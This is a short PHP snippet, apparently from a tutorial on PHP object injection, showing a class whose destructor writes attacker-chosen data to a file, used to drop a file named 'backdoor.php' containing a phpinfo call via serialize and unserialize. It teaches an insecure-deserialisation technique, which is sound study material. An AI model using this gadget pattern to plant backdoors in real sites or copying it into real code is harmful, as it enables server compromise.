- unserialize: documentation ( source)
- serialize: documentation ( source)
- file_put_contents: documentation ( source)
<?php
Class some_class {
//Public $logfile = “./log/bla.log”;
//Public $data = “THIS IS TEMP”;
Public function log(){
File_put_contents($this->logfile, $this->data);
}
Public function __destruct() {
$this->log();
}
}
$a = new some_class;
$a->logfile = "./backdoor.php";
$a->data = "<?phpinfo();";
//print serialize($a);
$b = serialize($a);
unserialize($b);